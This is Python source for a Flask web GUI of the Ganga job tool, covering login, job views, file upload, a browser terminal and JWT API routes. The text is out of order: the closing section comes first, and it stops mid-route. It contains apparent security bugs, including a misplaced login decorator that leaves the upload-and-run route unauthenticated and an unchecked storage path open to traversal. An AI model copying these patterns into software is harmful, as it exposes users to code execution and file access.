# ******************** Helper Functions ******************** #
# Validate uploaded filename.
def allowed_file(filename):
return "." in filename and filename.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS
# Make HTTP request to the Internal Flask Server which is running on a GangaThread which has access to ganga namespace.
def query_internal_api(route: str, method: str, **kwargs):
"""
:param route: str
:param method: str
:param kwargs: dict
:return: dict
Make a HTTP request to the Internal API Flask server which runs on a GangaThread to query data from Ganga.
Check response status code and extract the data or raise an exception accordingly.
kwargs can be param, json, etc. Any attribute that is supported by the requests module.
"""
# Internal url for communicating with API server running on a GangaThread
INTERNAL_URL = f"http://localhost:{gui.config['INTERNAL_PORT']}"
# Raise error if HTTP method not supported
if method not in ["get", "post", "put", "delete"]:
raise Exception(f"Unsupported method: {method}")
# Made the HTTP requests, along with whatever arguments provided
res = getattr(requests, method)(INTERNAL_URL + route, **kwargs)
# Check is request is OK
if res.status_code != 200:
raise Exception(res.json().get("message"))
# Return request data
return res.json()
def create_session_defaults():
"""
Create user session defaults and assign default values to them.
"""
# Set session defaults for templates filter
if "templates_per_page" not in session:
session["templates_per_page"] = 10
if "templates_filter" not in session:
session["templates_filter"] = {key: "any" for key in ["application", "backend"]}
# Set session defaults for jobs filter
if "jobs_per_page" not in session:
session["jobs_per_page"] = 10
if "jobs_filter" not in session:
session["jobs_filter"] = {key: "any" for key in ["status", "application", "backend"]}
# Set session defaults for subjobs filter
if "subjobs_per_page" not in session:
session["subjobs_per_page"] = 10
if "subjobs_filter" not in session:
session["subjobs_filter"] = {key: "any" for key in ["status", "application", "backend"]}
# Ping internal API server
def ping_internal():
"""
Ping internal API server if it is running
"""
trials = 0
while True:
try:
ping = query_internal_api("/ping", "get")
if ping is True:
return True
except:
time.sleep(2)
print("Internal API server not online (mostly because Ganga is booting up), retrying...")
trials += 1
if trials > 20:
return False
def start_ganga(internal_port: int, args: str = ""):
"""
Start a ganga session in a pseudo terminal and stores the file descriptor of the terminal as well as the PID of the ganga session.
:param args: str - str of arguments to provide to ganga
:param internal_port: int
"""
# Create child process attached to a pty that we can read from and write to
(child_pid, fd) = pty.fork()
if child_pid == 0:
# This is the child process fork. Anything printed here will show up in the pty, including the output of this subprocess
ganga_env = os.environ.copy()
ganga_env["WEB_CLI"] = "True"
ganga_env["INTERNAL_PORT"] = str(internal_port)
subprocess.run(f"ganga --webgui {args}", shell=True, env=ganga_env)
else:
# This is the parent process fork. Store fd (connected to the child’s controlling terminal) and child pid
gui.config["FD"] = fd
gui.config["CHILD_PID"] = child_pid
set_windowsize(fd, 50, 50)
print("Ganga started, PID: ", child_pid)
# Set the window size of the pseudo terminal according to the size in the frontend
def set_windowsize(fd, row, col, xpix=0, ypix=0):
winsize = struct.pack("HHHH", row, col, xpix, ypix)
fcntl.ioctl(fd, termios.TIOCSWINSZ, winsize)
# Read and forward that data from the pseudo terminal to the frontend
def read_and_forward_pty_output():
max_read_bytes = 1024 * 20
while True:
socketio.sleep(0.01)
if gui.config["FD"]:
timeout_sec = 0
(data_ready, _, _) = select.select([gui.config["FD"]], [], [], timeout_sec)
if data_ready:
output = os.read(gui.config["FD"], max_read_bytes).decode()
socketio.emit("pty-output", {"output": output}, namespace="/pty")
def start_web_cli(host: str, port: int, internal_port: int, log_output=True, ganga_args: str = ""):
"""
Start the web server on eventlet serving the terminal on the specified port. (Production ready server)
:param ganga_args: str - arguments to be passed to ganga
:param host: str
:param port: int
:param internal_port: int
"""
from GangaGUI.start import create_default_user
# Create default user
gui_user, gui_password = create_default_user()
print(f"Starting the GUI server on http://{host}:{port}")
print(f"You login information for the GUI is: Username: {gui_user.user} Password: {gui_password}")
gui.config["INTERNAL_PORT"] = internal_port
gui.config["WEB_CLI"] = True
gui.config["GANGA_ARGS"] = ganga_args
socketio.run(gui, host=host, port=port, log_output=log_output) # TODO
# ******************** Shutdown Function ******************** #
# Route used to shutdown the Internal API server and GUI server
@gui.route("/shutdown", methods=["GET"])
def shutdown():
if gui.config["WEB_CLI"] is True:
flash("WEB CLI Mode is on, cannot self shutdown server. Consider doing manually.", "warning")
return redirect(url_for("dashboard"))
try:
response_info = query_internal_api("/shutdown", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return "GUI Shutdown Successful."
# ******************** EOF ******************** #
| import os
import jwt
import json
import requests
import time
import select
import termios
import struct
import fcntl
import subprocess
import pty
import sys
import datetime
from functools import wraps
from werkzeug.utils import secure_filename, safe_join
from werkzeug.security import generate_password_hash, check_password_hash
from flask import Flask, request, jsonify, render_template, flash, redirect, url_for, session, send_file, make_response
from flask_login import login_user, login_required, logout_user, current_user, UserMixin
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_socketio import SocketIO
from GangaGUI.gui.config import Config
# ******************** Initialisation of Flask App for GUI ******************** #
# GUI Flask App and set configuration from ./config.py file
gui = Flask(__name__)
gui.config.from_object(Config)
# Database object which is used to interact with the "gui.sqlite" in gangadir/gui folder
# NOTE: IT HAS NO RELATION WITH THE GANGA PERSISTENT DATABASE
db = SQLAlchemy(gui)
# Login manage for the view routes
login = LoginManager(gui)
login.login_view = "login"
login.login_message = "Please Login to Access this Page."
login.login_message_category = "warning"
# For websocket, for communication between frontend and backend
socketio = SocketIO(gui)
# ******************** The user class for database and authentication ******************** #
# ORM Class to represent Users - used to access the GUI & API resources
class User(UserMixin, db.Model):
__tablename__ = "users"
id = db.Column(db.Integer, primary_key=True)
public_id = db.Column(db.String(64), unique=True)
user = db.Column(db.String(32), unique=True)
password_hash = db.Column(db.String(64))
role = db.Column(db.String(32))
pinned_jobs = db.Column(db.Text)
def store_password_hash(self, password: str):
self.password_hash = generate_password_hash(password)
def verify_password(self, password: str) -> bool:
return check_password_hash(self.password_hash, password)
def generate_auth_token(self, expires_in_days: int = 5) -> str:
return jwt.encode(
{"public_id": self.public_id, "exp": datetime.datetime.utcnow() + datetime.timedelta(days=expires_in_days)},
gui.config["SECRET_KEY"], algorithm="HS256")
def __repr__(self):
return "User {}: {} (Public ID: {}, Role: {})".format(self.id, self.user, self.public_id, self.role)
# User Loader Function for Flask Login
@login.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
# ******************** Global Variables ******************** #
# Colors showed for different job statuses in the GUI based on Bootstrap CSS
status_color = {
"new": "info",
"completed": "success",
"completed_frozen" : "success",
"failed": "danger",
"failed_frozen" : "danger",
"running": "primary",
"submitted": "secondary",
"killed": "warning"
}
# Allowed extensions when uploading any files to GUI
ALLOWED_EXTENSIONS = {"txt", "py"}
# Variables to globally store plugins and actions
actions = {}
plugins = {}
# ******************** Run Before First Request ******************** #
# Execute before first request
@gui.before_first_request
def initial_run():
"""
This function runs before first request. It stores actions and plugins information from the ganga. It create default session cookies. If WEB_CLI is also started then it also starts a Ganga session.
"""
global actions, plugins
# Start ganga if WEB_CLI mode is True
if gui.config['WEB_CLI'] is True:
start_ganga(gui.config['INTERNAL_PORT'], args=gui.config["GANGA_ARGS"])
session["WEB_CLI"] = True
elif gui.config['INTERNAL_PORT'] is None:
gui.config['INTERNAL_PORT'] = os.environ['INTERNAL_PORT']
# If user is authenticated, log them out. This happens after a fresh start of the GUI server.
if current_user.is_authenticated:
logout_user()
# Create user session defaults
create_session_defaults()
# Check if internal server is online, exit after 20s of retrying
if not ping_internal():
print("INTERNAL SERVER UNAVAILABLE, TERMINATING...")
sys.exit(1)
# Get job actions and plugins information from ganga
try:
# Get actions and plugins data once
actions = query_internal_api("/internal/jobs/actions", "get")
plugins = query_internal_api("/internal/plugins", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
# ******************** View Routes ******************** #
# Login View
@gui.route("/login", methods=["GET", "POST"])
def login():
"""
Handles login route of the GUI.
"""
# If already authenticated, logout
if current_user.is_authenticated:
return redirect(url_for("dashboard"))
# Login user
if request.method == "POST":
# Form data
username = request.form.get("username")
password = request.form.get("password")
# Database query
user = User.query.filter_by(user=username).first()
# If valid user, login
if user and user.verify_password(password):
login_user(user, True)
flash("Login successful", "success")
return redirect(url_for("dashboard"))
flash("Error identifying the user", "danger")
# Get users from the database
users = User.query.all()
return render_template("login.html", title="Login", users=users)
# Logout View
@gui.route("/logout", methods=["GET"])
def logout():
"""
Logout user from GUI
"""
# Logout
if current_user.is_authenticated:
logout_user()
return redirect(url_for("login"))
# Dashboard view
@gui.route("/")
@login_required
def dashboard():
"""
Handles the dashboard route of the GUI.
"""
quick_statistics = {}
recent_jobs_info = []
pinned_jobs_info = []
try:
# Query overall statistics
quick_statistics = query_internal_api("/internal/jobs/statistics", "get")
# Query recent 10 jobs
recent_jobs_info = query_internal_api("/internal/jobs/recent", "get")
# Query pinned jobs
u = current_user
pinned_jobs_info = query_internal_api("/internal/jobs", "get", params={
"ids": u.pinned_jobs if u.pinned_jobs is not None else json.dumps([]),
"auto-validate-ids": True})
except Exception as err:
# Flash the error in the GUI
flash(str(err), "danger")
return render_template("dashboard.html",
title="Dashboard",
quick_statistics=quick_statistics,
recent_jobs_info=recent_jobs_info,
pinned_jobs_info=pinned_jobs_info,
status_color=status_color)
# Config view
@gui.route("/config", methods=["GET", "POST"])
@login_required
def config_page():
"""
Handles the config route of the GUI.
"""
full_config_info = []
config_info = []
section = None
# When GUI request for specific section
if request.method == "POST":
# Get section name for request form data
section = request.form.get("section")
section = None if section in ["", None] else section
try:
# Query full config
full_config_info = query_internal_api("/internal/config", "get")
# If asked for specific section, add only that for displaying
config_info = full_config_info if section is None else [s for s in full_config_info if s["name"] == section]
except Exception as err:
# Flash the error in the GUI
flash(str(err), "danger")
return render_template("config.html", title="Config", full_config_info=full_config_info, config_info=config_info)
#Edit gangarc
@gui.route("/config_edit",methods=["GET", "POST"])
@login_required
def edit_config_page():
"""
Edit gangarc file from the GUI
"""
gui_rc = gui.config["GANGA_RC"]
with open(gui_rc, "rt") as f:
ganga_config = f.read()
if request.method == 'POST':
config_ganga = request.form['config-data']
with open(gui_rc, 'w') as f1:
f1.write(str(config_ganga))
flash(".gangarc Edited", "success")
with open(gui_rc, "rt") as f2:
ganga_config = f2.read()
return render_template("config_edit.html", title="Edit gangarc", ganga_config=ganga_config)
@login_required
# Create view
@gui.route("/create", methods=["GET", "POST"])
def create_page():
"""
Handles create route of the GUI.
"""
# Handle file uploads
if request.method == "POST":
# Load from the uploaded file
if "loadfile" in request.files:
loadfile = request.files["loadfile"]
if loadfile.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
# If valid file, the save the file
if loadfile and allowed_file(loadfile.filename):
save_path = os.path.join(gui.config["UPLOAD_FOLDER"], "loadfile.txt")
loadfile.save(save_path)
# Load the file
try:
# Query to load the file
response_info = query_internal_api("/internal/load", "get", params={"path": save_path})
except Exception as err:
# Display error in the GUI
flash(str(err), "danger")
return redirect(request.url)
# Success message
flash(response_info.get("message"), "success")
return redirect(request.url)
# Run file using the runfile GPI function
if "runfile" in request.files:
runfile = request.files["runfile"]
if runfile.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
# If valid file, save the file
if runfile and allowed_file(runfile.filename):
save_path = os.path.join(gui.config["UPLOAD_FOLDER"], "runfile.py")
runfile.save(save_path)
# Run the file
try:
# Query ganga to run the file
response_info = query_internal_api("/internal/runfile", "get", params={"path": save_path})
except Exception as err:
# Display error back to GUI
flash(str(err), "danger")
return redirect(request.url)
# Success message
flash(response_info.get("message"), "success")
return redirect(request.url)
# No file case
flash("No file, retry!", "warning")
return redirect(request.url)
try:
# Query templates info
templates_info = query_internal_api("/internal/templates", "get",
params={"recent": True, "length": "6"})
except Exception as err:
# Display error to GUI
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("create.html", title="Create", templates_info=templates_info)
# Runfile view
@gui.route("/create/runfile", methods=["GET", "POST"])
@login_required
def runfile_page():
"""
Quick create a runfile to be run using the runfile GPI function.
"""
# Runfile path
runfile_path = os.path.join(gui.config["UPLOAD_FOLDER"], "runfile.py")
# Save runfile data from frontend
if request.method == "POST":
runfile_data = request.form.get("runfile-data")
with open(runfile_path, "w+") as f:
f.write(runfile_data)
# Run the file
try:
# Query ganga to run the file
response_info = query_internal_api("/internal/runfile", "get", params={"path": runfile_path})
flash(response_info["message"], "success")
except Exception as err:
# Display error back in the GUI
flash(str(err), "danger")
return redirect(request.url)
return render_template("runfile.html", title="Runfile")
# Templates view
@gui.route("/templates", methods=["GET", "POST"])
@login_required
def templates_page():
"""
Handles the templates route of the GUI. Displays templates in a tabular form.
"""
# Update filter values
if request.method == "POST":
# Add filter data to user session
session["templates_per_page"] = int(request.form.get("templates-per-page"))
session["templates_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["application", "backend"], ["template-application", "template-backend"])}
# Current page
current_page = int(request.args.get("page")) if request.args.get("page") is not None else 0
# Get user defined value from session
templates_per_page = session["templates_per_page"]
try:
# Query total number of templates
templates_length = query_internal_api("/internal/templates/length", "get", params=session["templates_filter"])
# Calculate number of max pages
number_of_pages = (int(templates_length) // int(templates_per_page)) + 1
# if current page exceeds last possible page, redirect to last page
if current_page >= number_of_pages:
return redirect(url_for("templates_page", page=number_of_pages - 1))
# Add templates filters and range options for query params
params = session["templates_filter"].copy()
params.update({
"recent": True,
"length": templates_per_page,
"offset": current_page
})
# Query templates information
templates_info = query_internal_api("/internal/templates", "get", params=params)
except Exception as err:
# Flash error if any
flash(str(err), "danger")
return redirect(url_for("create_page"))
return render_template("templates.html",
title="Templates",
number_of_pages=number_of_pages,
current_page=current_page,
backends=plugins["backends"],
applications=plugins["applications"],
templates_info=templates_info)
# Jobs view
@gui.route("/jobs", methods=["GET", "POST"])
@login_required
def jobs_page():
"""
Handles jobs route of the GUI. Displays jobs in a tabular view.
"""
# Update filter values
if request.method == "POST":
# Add form data to user session
session["jobs_per_page"] = int(request.form.get("jobs-per-page"))
session["jobs_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["status", "application", "backend"],
["job-status", "job-application", "job-backend"])}
# Current page
current_page = int(request.args.get("page")) if request.args.get("page") is not None else 0
# Get user defined value from user session
jobs_per_page = session["jobs_per_page"]
try:
# Query total number of jobs
jobs_length = query_internal_api("/internal/jobs/length", "get", params=session["jobs_filter"])
# Calculate number of max pages
number_of_pages = (int(jobs_length) // int(jobs_per_page)) + 1
# if current page exceeds last possible page, redirect to last page
if current_page >= number_of_pages:
return redirect(url_for("jobs_page", page=number_of_pages - 1))
# Add jobs filters and range options for query params
params = session["jobs_filter"].copy()
params.update({
"recent": True,
"length": jobs_per_page,
"offset": current_page
})
# Query jobs information
jobs_info = query_internal_api("/internal/jobs", "get", params=params)
except Exception as err:
# Display error back to GUI
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("jobs.html",
title="Jobs",
jobs_info=jobs_info,
backends=plugins["backends"],
applications=plugins["applications"],
number_of_pages=number_of_pages,
current_page=current_page,
status_color=status_color)
# Job view
@gui.route('/jobs/<int:job_id>')
@login_required
def job_page(job_id: int):
"""
Handles job route of the GUI. Displays all the information about the job.
:param job_id: int
"""
stdout = None
stderr = None
try:
# Query job information
job_info = query_internal_api(f"/internal/jobs/{job_id}", "get")
# Query full print of the job
full_print_info = query_internal_api(f"/internal/jobs/{job_id}/full-print", "get")
# stdout and stderr path
stdout_path = os.path.join(job_info["outputdir"], "stdout")
stderr_path = os.path.join(job_info["outputdir"], "stderr")
# Get stdout
if os.path.exists(stdout_path):
with open(stdout_path) as f:
stdout = f.read()
# Get stderr
if os.path.exists(stderr_path):
with open(stderr_path) as f:
stderr = f.read()
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("jobs_page"))
return render_template("job.html",
title=f"Job {job_id}",
job_info=job_info,
status_color=status_color,
attribute_actions=actions.get("attributes"),
method_actions=actions.get("methods"),
stdout=stdout,
stderr=stderr,
full_print_info=full_print_info)
# Export job
@gui.route("/jobs/<int:job_id>/export")
@login_required
def job_export(job_id: int):
"""
Sends the job file which is generated using export function of GPI.
:param job_id: int
"""
# Path to save file using export GPI function
export_path = os.path.join(gui.config["UPLOAD_FOLDER"], f"export.txt")
try:
# Query to export the job at export path
response_info = query_internal_api(f"/internal/jobs/{job_id}/export", "get", params={"path": export_path})
# Send file
return send_file(export_path, as_attachment=True, cache_timeout=0, attachment_filename=f"Job_{job_id}.txt")
except Exception as err:
# Display error back to GUI
flash(str(err), "danger")
return redirect(url_for("job_page", job_id=job_id))
# Edit job
@gui.route("/jobs/<int:job_id>/edit", methods=["GET", "POST"])
@login_required
def job_edit(job_id: int):
"""
Show the exported job text on the GUI for it to be edited and submit. Will create a new job after submission.
:param job_id: int
"""
# Save paths
loadfile_path = os.path.join(gui.config["UPLOAD_FOLDER"], "loadfile.txt")
export_path = os.path.join(gui.config["UPLOAD_FOLDER"], "export.txt")
# Create a new job with the submitted information
if request.method == "POST":
# Save the edited job info
edited_job_info = request.form.get("edited-job-info")
with open(loadfile_path, "w+") as f:
f.write(edited_job_info)
# Load the file
try:
# Query to load the job
response_info = query_internal_api("/internal/load", "get", params={"path": loadfile_path})
flash(response_info["message"], "success")
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(request.url)
try:
# Query to export the job text
response_info = query_internal_api(f"/internal/jobs/{job_id}/export", "get", params={"path": export_path})
# Read exported job file to display
with open(export_path) as f:
exported_data = f.read()
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("job_page", job_id=job_id))
return render_template("edit_job.html", title=f"Edit Job {job_id}", job_id=job_id, exported_data=exported_data)
# Browse job directory
@gui.route("/job/<int:job_id>/browse", defaults={"path": ""})
@gui.route("/job/<int:job_id>/browse/<path:path>")
@login_required
def job_browse(job_id: int, path):
"""
Browse directory of the job.
:param job_id: int
:param path: str
"""
try:
# Query job information
job_info = query_internal_api(f"/internal/jobs/{job_id}", "get")
# Base directory of the job
job_base_dir = os.path.dirname(os.path.dirname(job_info["outputdir"]))
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("job_page", job_id=job_id))
# Join the base and the requested path
abs_path = safe_join(job_base_dir, path)
# URL path variable for going back
back_path = os.path.dirname(abs_path).replace(job_base_dir, "")
# If path doesn't exist
if not os.path.exists(abs_path):
flash("Directory for this job does not exist.", "warning")
return redirect(url_for("job_page", job_id=job_id))
# Check if path is a file and send
if os.path.isfile(abs_path):
return send_file(abs_path)
files_info = []
# Show directory contents
files = os.listdir(abs_path)
# Store directory information
for file in files:
files_info.append({
"file": file,
"directory": os.path.isdir(os.path.join(abs_path, file))
})
return render_template('job_dir.html', title=f"Job {job_id} Directory",
job_id=job_id,
abs_path=abs_path,
files_info=files_info,
back_path=back_path)
# Subjobs view
@gui.route("/jobs/<int:job_id>/subjobs", methods=["GET", "POST"])
@login_required
def subjobs_page(job_id: int):
"""
Handles subjobs view of the GUI. Displays subjobs of a job in a tabular form.
:param job_id: int
"""
# Change filter values
if request.method == "POST":
# Add form data to client session
session["subjobs_per_page"] = int(request.form.get("subjobs-per-page"))
session["subjobs_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["status", "application", "backend"],
["subjob-status", "subjob-application", "subjob-backend"])}
# Current page
current_page = int(request.args.get("page")) if request.args.get("page") is not None else 0
# Get user defined value from session
subjobs_per_page = session["subjobs_per_page"]
try:
# Query total number of subjobs
subjobs_length = query_internal_api(f"/internal/jobs/{job_id}/subjobs/length", "get",
params=session["subjobs_filter"])
# Calculate number of max pages
number_of_pages = (int(subjobs_length) // int(subjobs_per_page)) + 1
# if current page exceeds last possible page, redirect to last page
if current_page >= number_of_pages:
return redirect(url_for("subjobs_page", page=number_of_pages - 1, job_id=job_id))
# Add subjobs filters and range options for query params
params = session["subjobs_filter"].copy()
params.update({
"recent": True,
"length": subjobs_per_page,
"offset": current_page
})
# Query subjobs information
subjobs_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs", "get", params=params)
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", job_id=job_id))
return render_template("subjobs.html",
title=f"Subjobs - Job {job_id}",
status_color=status_color,
number_of_pages=number_of_pages,
current_page=current_page,
backends=plugins["backends"],
applications=plugins["applications"],
subjobs_info=subjobs_info,
job_id=job_id)
# Subjob view
@gui.route("/jobs/<int:job_id>/subjobs/<int:subjob_id>", methods=["GET"])
@login_required
def subjob_page(job_id: int, subjob_id: int):
"""
Handles subjob route of the GUI. Displays extensive details of a subjob.
:param job_id: int
:param subjob_id: int
"""
stdout = None
stderr = None
try:
# Query job information
job_outputdir = query_internal_api(f"/internal/jobs/{job_id}/outputdir", "get")
# Query subjob information
subjob_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}", "get")
# Query full print of the job
full_print_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/full-print", "get")
# Extract browse path that can be used by job_browse route
job_dir_basepath = os.path.dirname(os.path.dirname(job_outputdir["outputdir"]))
subjob_dir_basepath = os.path.dirname(os.path.dirname(subjob_info["outputdir"]))
browse_path = subjob_dir_basepath.replace(job_dir_basepath, "")
# stdout and stderr path
stdout_path = os.path.join(subjob_info["outputdir"], "stdout")
stderr_path = os.path.join(subjob_info["outputdir"], "stderr")
# Get stdout
if os.path.exists(stdout_path):
with open(stdout_path) as f:
stdout = f.read()
# Get stderr
if os.path.exists(stderr_path):
with open(stderr_path) as f:
stderr = f.read()
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("subjobs_page", job_id=job_id))
return render_template("subjob.html",
title=f"Subjob {subjob_id} - Job {job_id}",
subjob_info=subjob_info,
status_color=status_color,
attribute_actions=actions["attributes"],
method_actions=actions["methods"],
stdout=stdout,
stderr=stderr,
full_print_info=full_print_info,
job_id=job_id,
browse_path=browse_path)
# Credential view
@gui.route("/credentials")
@login_required
def credentials_page():
"""
Handles credential store view of the GUI. Displays credentials in a tabular form.
"""
try:
# Query credential store information
credentials_info = query_internal_api("/internal/credentials", "get")
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('credentials.html', credential_info_list=credentials_info)
@gui.route("/queue", methods=["GET"])
@login_required
def queue_page():
"""
Displays queues information
"""
try:
queue_info = query_internal_api("/internal/queue", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('queue.html', queue_info_list=queue_info)
# Plugins view
@gui.route('/plugins')
@login_required
def plugins_page():
"""
Handles plugins route of the GUI. Displays the list of plugins.
"""
try:
# Store plugins information
plugins_info = plugins
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('plugins.html', plugins_info=plugins_info)
# Plugin view
@gui.route("/plugin/<plugin_name>")
@login_required
def plugin_page(plugin_name: str):
"""
Displays information about the plugin like it's docstring.
:param plugin_name: str
"""
try:
# Query plugin information
plugin_info = query_internal_api(f"/internal/plugins/{plugin_name}", "get")
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("plugins_page"))
return render_template("plugin.html", title=f"{plugin_name}", plugin_info=plugin_info)
# Ganga logs view
@gui.route("/logs")
@login_required
def logs_page():
"""
Diplay ganga log file.
:return:
"""
ganga_log_path = gui.config["GANGA_LOG"]
gui_accesslog_path = gui.config["ACCESS_LOG"]
gui_errorlog_path = gui.config["ERROR_LOG"]
try:
# Get ganga log
with open(ganga_log_path, "rt") as f:
ganga_log_data = f.read()
# Get GUI access log
with open(gui_accesslog_path, "rt") as f:
gui_accesslog_data = f.read()
# Get GUI error log
with open(gui_errorlog_path, "rt") as f:
gui_errorlog_data = f.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("logs.html", title="Logs", ganga_log_data=ganga_log_data,
gui_accesslog_data=gui_accesslog_data, gui_errorlog_data=gui_errorlog_data)
@gui.route("/storage", defaults={"path": ""}, methods=["GET", "POST"])
@gui.route("/storage/<path:path>", methods=["GET", "POST"])
@login_required
def storage_page(path):
"""
A convenience feature to store some file remotely in gangadir/storage
"""
# Storage folder path
storage_folder = gui.config["STORAGE_FOLDER"]
# Join the storage path and the requested path
abs_path = os.path.join(storage_folder, path)
# Handle file uploads
if request.method == "POST":
# Uploaded file
if "storagefile" in request.files:
storagefile = request.files["storagefile"]
if storagefile.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
# If valid file, the save the file
if storagefile:
# Directory check
if not os.path.isdir(abs_path):
flash("Error while uploading the file", "danger")
return redirect(request.url)
filename = secure_filename(storagefile.filename)
save_path = os.path.join(abs_path, filename)
storagefile.save(save_path)
# Success message
flash("Successfully uploaded the file.", "success")
return redirect(request.url)
# No file case
flash("No file, retry!", "warning")
return redirect(request.url)
# URL path variable for going back
back_path = os.path.dirname(abs_path).replace(storage_folder, "")
# If path doesn't exist
if not os.path.exists(abs_path):
flash("Directory does not exist.", "warning")
return redirect(url_for("dashboard"))
# Check if path is a file and send
if os.path.isfile(abs_path):
return send_file(abs_path)
files_info = []
# Show directory contents
files = os.listdir(abs_path)
# Store directory information
for file in files:
files_info.append({
"file": file,
"directory": os.path.isdir(os.path.join(abs_path, file))
})
return render_template("storage.html", title="Storage",
abs_path=abs_path,
files_info=files_info,
back_path=back_path)
# Serve CLI
@gui.route("/cli")
@login_required
def serve_cli():
return render_template("cli.html")
# Establish a websocket connection from the frontend to the server
@socketio.on("connect", namespace="/pty")
def connect():
"""
New client connected, start reading and writing from the pseudo terminal.
"""
if gui.config["CHILD_PID"] and current_user.is_authenticated:
# Start background reading and emitting the output of the pseudo terminal
socketio.start_background_task(target=read_and_forward_pty_output)
return
# Input from the frontend
@socketio.on("pty-input", namespace="/pty")
def pty_input(data):
"""
Write to the child pty. The pty sees this as if you are typing in a real terminal.
"""
if gui.config["FD"] and current_user.is_authenticated:
os.write(gui.config["FD"], data["input"].encode())
# Resize the pseudo terminal when the frontend is resized
@socketio.on("resize", namespace="/pty")
def resize(data):
"""
Resize the pseudo terminal according to the dimension at the frontend.
:param data: contains information about rows and cols of the frontend terminal.
"""
if gui.config["FD"] and current_user.is_authenticated:
set_windowsize(gui.config["FD"], data["rows"], data["cols"])
# ******************** Token Based Authentication ******************** #
# Generate token for API authentication - token validity 5 days
@gui.route("/token", methods=["POST"])
def generate_token():
"""
Using the 'user' and 'password' data from the form body, validates the user and returns a JSON Web Token (JWT).
"""
# Request form data
request_json = request.json if request.json else {}
request_user = request_json.get("username")
request_password = request_json.get("password")
# Handle no user or no password case
if not request_user or not request_password:
response_data = {"success": False, "message": "Could not verify user."}
return jsonify(response_data), 401
# Verify user and accordingly return the token
user = User.query.filter_by(user=request_user).first()
if user and user.verify_password(request_password):
token = user.generate_auth_token().decode("UTF-8")
response_data = {"token": token}
return jsonify(response_data)
# If authentication fails, return 401 HTTP code
response_data = {"success": False, "message": "Could not verify user."}
return jsonify(response_data), 401
# ******************** Token Authentication Decorator ******************** #
# Decorator for token protected routes
def token_required(f):
"""
Decorator which validates the request header token in 'X-Acess-Token' field, and returns the user.
"""
@wraps(f)
def decorated(*args, **kwargs):
token = None
# Extract token from headers
if "X-Access-Token" in request.headers:
token = request.headers["X-Access-Token"]
if not token:
return jsonify({"success": False, "message": "Token is missing"}), 401
# Decode the token and subsequently identify the user
try:
data = jwt.decode(token, gui.config["SECRET_KEY"], algorithms=["HS256"])
current_api_user = User.query.filter_by(public_id=data["public_id"]).first()
if current_api_user is None:
return jsonify({"success": False, "message": "Token is old. Please renew"}), 401
except jwt.ExpiredSignatureError:
return jsonify({"success": False, "message": "Token is expired"}), 401
except jwt.InvalidTokenError:
return jsonify({"success": False, "message": "Token is invalid"}), 401
except:
return jsonify({"success": False, "message": "Could not verify token"}), 401
return f(current_api_user, *args, **kwargs)
return decorated
# ******************** Job API ******************** #
# Single job information API - GET Method
@gui.route("/api/jobs/<int:job_id>", methods=["GET"])
@token_required
def job_endpoint(current_api_user, job_id: int):
"""
Given the job_id, returns the general information related to the job in JSON format.
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query job information to the GPI
job_info = query_internal_api(f"/internal/jobs/{job_id}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(job_info)
# Single job attribute information API - GET Method
@gui.route("/api/jobs/<int:job_id>/<attribute>", methods=["GET"])
@token_required
def job_attribute_endpoint(current_api_user, job_id: int, attribute: str):
"""
Given the job_id and attribute, returns the attribute information in the JSON format.
:param job_id: int
:param attribute: str
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query job attribute information from ganga
job_attribute_info = query_internal_api(f"/internal/jobs/{job_id}/{attribute}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(job_attribute_info)
# Single job full print API - GET Method
@gui.route("/api/jobs/<int:job_id>/full-print", methods=["GET"])
@token_required
def job_full_print_endpoint(current_api_user, job_id: int):
"""
Return full print of the job.
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query job full print from ganga
full_print_info = query_internal_api(f"/internal/jobs/{job_id}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(full_print_info)
# Create job using template API - POST Method
@gui.route("/api/jobs/create", methods=["POST"])
@token_required
def job_create_endpoint(current_api_user):
"""
Create a new job using the existing template.
IMPORTANT: template_id NEEDS to be provided in the request body. job_name can optionally be provided in the request body.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
# Request data
data = {
"template_id": request.json.get("template_id"),
"job_name": request.json.get("job_name")
}
try:
# Query ganga to create a job using the template id
response_info = query_internal_api("/internal/jobs/create", "post", json=data)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# Copy job API - PUT Method
@gui.route("/api/jobs/<int:job_id>/copy", methods=["PUT"])
@token_required
